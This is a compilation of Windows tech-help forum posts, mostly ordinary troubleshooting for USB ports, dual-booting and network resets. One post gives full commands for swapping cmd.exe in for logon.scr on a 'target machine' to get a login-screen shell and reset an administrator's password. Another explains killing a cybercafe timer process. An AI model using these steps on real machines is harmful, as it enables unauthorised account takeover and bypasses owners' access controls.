Flyuche, I think you shrink'd the article the way you shrink the Vista partition ![]() It's good to give credit where due ![]() http://www.pctipsbox.com/how-do-i-install-windows-xp-on-a-computer-with-windows-vista-pre-installed/ I think we all know how to use the search function ![]() For other interested, See: http://www.raymond.cc/blog/archives/2007/10/07/how-to-dual-boot-xp-and-vista-with-xp-installed-first/ There's another article for a vice-versa situation, Raymond is a good friend and will guide you through it if required. -[n3rve] |
I think the USB Serial adapter is not really a bad option, but why don't you go for a PCI instead? You won't need to continue plugging and unpluggin adapters from your system, that might help so you don't break something else, just like you did. angelina08:Sorry, not trying to go off topic, but how can a whole computer get damaged because USB ports aren't functional? I'd appreciate further explanation ![]() sojioguns:Well said, nice suggestions put forward ![]() I also sense a hardware issue, however, I doubt it has anything to do with BIOS settings as it worked previously and the ports started to go bad shortly after another. See: http://support.microsoft.com/kb/817900 jay8ers:A complete windows installation because USB ports stopped working and/or drivers got corrupt? Not really necessary in my opinion, although that may help as some viruses (malware) can disable USB ports with few registry changes, that's one other thing I'd like the thread starter to look at. I'm unable to search for the registry value at this time ![]() Good luck with the computer ![]() -[n3rve] |
It's hard to say as several things can make USB ports stop responding. Click on `Start` -> Right Click on `My Computer` -> Properties `Hardware` tab -> Device Manager Search for Universal Serial Bus Controllers Do they have a yellow question mark? Most likely not the case as it worked before . . Double click on each controller (driver), the device Status should say. "This device is working properly", do you see that? The following is information I was able to gather from Microsoft's site: Use Device Manager to scan for hardware changes. After your computer scans for hardware changes, it might recognize the USB device connected to the USB port so that you can use the device. To scan for hardware changes, follow these steps. [list][li]Click Start, and then click Run.[/li] [li]Type devmgmt.msc, and then click OK. Device Manager opens.[/li] [li]In Device Manager, click your computer so that it is highlighted.[/li] [li]Click Action, and then click Scan for hardware changes.[/li] [li]Check the USB device to see whether it is working.[/li][/list] -[n3rve] |
stepestus:Now, that's an insignificant solution!! Replacing the CMD.exe would not resolve the poster's problem 'cos access to CMD is controlled via a registry value which can be altered manually or via the built in Group Policy Manager in Windows XP. Your best bet is the vb script posted by Maleeq which will execute this query .RegDelete "HKCU\Software\Policies\Microsoft\Windows\System\DisableCMD"Or you can do that manually if the Registry hasn't been disabled too. ![]() -[n3rve] |
Click Here Do this using the Command Prompt, the best way around everyshit. Download process.exe from the page linked above. Fire up a CMD window (Start -> Run -> 'cmd'), extract the content of the zip and drag it into the CMD window and execute. It's a command line Task manager. Locate the PID of your cafe timer (a name will help). run:
taskkill - kill a task /f - with force /pid the # displayed beside the running process /t - Murder its descendants, child processes :p Report Back ![]() You could also run 'msconfig', uncheck the software and reboot - run '%programfiles%, delete its files. Get Process Explorer, Process Handler, etc .Murder everything or a Linux Live CD - u know they are so many ways to trap a rat.-[n3rve] |

I'm impressed with the work here . . Keep it up uspry1 ![]() -[n3rve] |
I like the work everyone does here. I have a server with 600GB+ with nothing on it. If anyone here knows how to use FTP (File Transfer Protocol), you can contact me so I get an account created for you at the server's cpanel. You'll be able to upload whatever you want to our server and provide direct download links. Direct in the sense that, a click from here will bring up the download pop-up window. Seems more like a virus attack to me [Internet Explorer Errors]A complete scan with an updated vdef db would get rid of the virus, but little changes would have been made! The attached files will enable registry editing which may also be disabled and the Task Manager! Msconfig outsourced from another XP installation is also attached, Extract and have it stored at "%windir%\pchealth\helpctr\binaries" |
Tini, So you use multilinks at England, huh? ![]() |
Alternatively, You can dual boot. Back up Your files, Format the entire HD, create two partitions. C:\ & D:\ Install XP on both partitions! Boot into the running XP installation on C:\ and pop in a Windows Vista DVD and upgrade! Assign at least 15GB to the partion Vista will be installed on. (I Recommend). The Vista Boot Loader will add the existing XP installation to its OS list, it will be titled; "Earlier Version of Windows" You can use EasyBCD or Vista Boot Pro to rename "Earlier Version of Windows" to "Nairaland XP" or "XP Service Pack 15" ![]() If You will like to retain the existing Vista installation! You can shrink the existing partition to create space for XP! Refer to the link below: Open a Google window and type: inurl:www.raymond.cc Dual Boot Vista/XP That blog has all You need to get You going!! |
oineoma:ooops! I didn't read this Post!! ermmm . . All my IPs have been Banned, Seun - This is no Hack! Please, don't IP Ban me ![]() Try This: If you log into a limited account on your target machine and open up a dos prompt then enter this set of commands Exactly: on the welcome screen of a normal booted machine) cd\ *drops to root cd\windows\system32 *directs to the system32 dir mkdir temphack *creates the folder temphack copy logon.scr temphack\logon.scr *backsup logon.scr copy cmd.exe temphack\cmd.exe *backsup cmd.exe del logon.scr *deletes original logon.scr rename cmd.exe logon.scr *renames cmd.exe to logon.scr exit *quits dos ----------------------------------------------------------------------------- Now what you have just done is told the computer to backup the command program and the screen saver file, then edits the settings so when the machine boots the screen saver you will get an unprotected dos prompt with out logging into XP. Once this happens if you enter this command minus the quotes "net user <admin account name here> password" If the Administrator Account is called n3rve and you want the password "n3rve_hacker666" enter this "net user n3rve n3rve_hacker666" and this changes the password on n3rve's Machine. [Yo!! a_s_s can't try this on my MAC Book, infact don't ] ![]() Laters Mayne . . . |
NOOO!!! It's [n3rve] ![]() How do u know me? ![]() |
Just exported these out of my registry! The attached registry scripts would work perfectly!! |
It's Pathetic!! |
Why did You accept the job if You knew You can't diagnose such problems that would definitely come in? I hope this comes in handy; Start, Run, CMD Reset WINSOCK entries to installation defaults: netsh winsock reset catalog Reset TCP/IP stack to installation defaults. netsh int ip reset reset.log If that doesn't resolve the problem, do this. ipconfig /all << --- copy these results and post them back here netsh diag gui <<--- not any FAILED entries and post them back here exit //Note: Bold Text are Commands!! -[n3rve] |
Hardy Heron is an Ubuntu distro* |

which will execute this query .RegDelete "HKCU\Software\Policies\Microsoft\Windows\System\DisableCMD"
